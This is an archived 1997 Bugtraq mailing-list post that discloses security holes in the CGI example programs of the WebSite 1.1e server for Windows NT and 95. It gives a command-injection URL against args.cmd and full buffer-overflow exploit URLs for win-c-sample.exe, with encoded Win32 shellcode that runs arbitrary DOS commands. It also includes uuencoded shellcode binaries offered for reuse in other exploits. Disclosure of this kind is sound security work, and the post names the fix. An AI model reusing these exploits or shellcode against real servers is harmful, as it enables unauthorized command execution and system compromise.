Bugtraq mailing list archives
Re: signal handling
From: solar () ideal ru (solar () ideal ru)
Date: Mon, 6 Jan 1997 20:56:21 -0500
Hi! Actually, this message is about buffer overflows in Windows, in general. But let me put some exploits in here first. I just happened to check out WebSite v1.1e for Windows NT and '95. There're some nice security holes there, in the CGI example programs (should I say - "as usual"?). The first thing that I noticed is about the scripts, they have the following lines in cgi-dos/args.cmd (and some others):
rem NEVER NEVER ECHO URL COMPONENTS UNQUOTED!!! Consider rem a query string of xxx&del+/s+c:\*.* Your hard drive gets rem erased!! Same goes for args and extra path info!!!
and then some lines like this:
echo QUERY_STRING="%QUERY_STRING%"
Obviously, just using the quotes is not enough. Why can't I close them, or use a linefeed? The exploit can be: http://website.host/cgi-dos/args.cmd?"&any+dos+command" Well, the stuff I just told about might be too obvious, some sysadmins I know already have all the example scripts removed. Now, let's get to the interesting stuff. There's also an example C program, compiled to cgi-shl/win-c-sample.exe, with the source provided in cgi-src/win-c-sample/win-c-sample.c, and the following line in there:
char *argv[32]; // Max 32 command line args
That's a WinMain local variable, and is passed to SplitArgs(), which does no bounds checking while filling it with the command line parameters. You know what that means -- a nice buffer overflow. Here are the exploits (I split the long URLs into several lines), you can use any dos command in them (replace spaces with _'s): -- WinNT (any version?): http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+- +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C6Lj%01V%8A %06<_u%03%80.?FAI%84%C0u%F0h0%10%F0wYhM\y[X%050PzPA9%01u%F0%83%E9%10% FF%D1h0%10%F0wYh%D0PvLX%0500vPA9%01u%F0%83%E9%1C%FF%D1cmd.exe_/c_copy _\WebSite\readme.1st_\WebSite\htdocs\x1.htm -- Win95 (the release version only, will crash others!): http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+- +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C62j%01V%8A %06<_u%03%80.?FAI%84%C0u%F0%BAto|_%B9t`}`%03%CA%FF%D1%BAX_|_%B9XP|`%0 3%CA%FF%D1c:\command.com_/c_copy_\WebSite\readme.1st_\WebSite\htdocs\ x1.htm The example dos commands just copy the WebSite's readme.1st file, so you can later check if the exploit worked by trying http://website.host/x1.htm. Note that the server should respond to these exploits with an "Error: no blank line separating header and data", because of the "1 file(s) copied" message appearing without a blank line before it (which is required for HTTP; if you need a command's output, you can redirect it to a file, and get that file via HTTP with a separate request). Finally, to the thing I'm writing this message for -- I mean the Win32 shellcode. I haven't seen any Win32 overflow exploits before (actually, didn't look for them), so I had to code my own shellcode. This seems not to be that simple as it would be for Win16, or as it is for most UNIX systems. The problem is that normally Windows kernel calls require extra relocation items, but the shellcode appears in an already loaded program. The solution I used in the exploits above is doing a call to fixed kernel offset. Actually, the WinNT exploit does pattern searches in the kernel (due to the number of different kernel versions out there), while the Win95 one uses fixed offsets (I don't have Win95 myself, thanks must go to Lord Byte for loading his WinIce and telling me the offsets). The two functions I use are WinExec and ExitProcess. Here're the two shellcodes in binary, uuencoded, so you can use them in your own exploits if you wish. begin 644 shell_nt.bin M:%Y8_^;_U(/&3&H!5HH&/%]U`X`N/T9!283`=?!H,!#P=UEH35QY6U@%,%!Z F4$$Y`77P@^D0_]%H,!#P=UEHT%!V3%@%,#!V4$$Y`77P@^D<_]'[ ` end begin 644 shell_95.bin M:%Y8_^;_U(/&,FH!5HH&/%]U`X`N/T9!283`=?"Z=&]\7[ET8'U@`\K_T;I8 ,7WQ?N5A0?&`#RO_1 ` end Note that I had to avoid using some codes (which the server didn't allow me to use), that's why I do things like: db 68h ; push imm32 pop esi ; \ pop eax ; | - the value being pushed jmp esi ; / call esp instead of: call $+5 ; would contain zeroes pop esi Have fun disassembling. I'll appreciate any suggestions on doing the kernel calls a better way. As for the holes -- the fix is obvious, just remove the examples after you, the webmaster, have checked them out. Also, the holes will probably get fixed in the next WebSite release (I wonder if they credit me;-). BTW, they didn't even have the quotes in scripts I mentioned above, in some earlier versions. Signed, Solar Designer
Current thread:
- signal handling Peter Jeremy (Jan 06)
- Re: signal handling Alex Belits (Jan 06)
- <Possible follow-ups>
- Re: signal handling solar () ideal ru (Jan 06)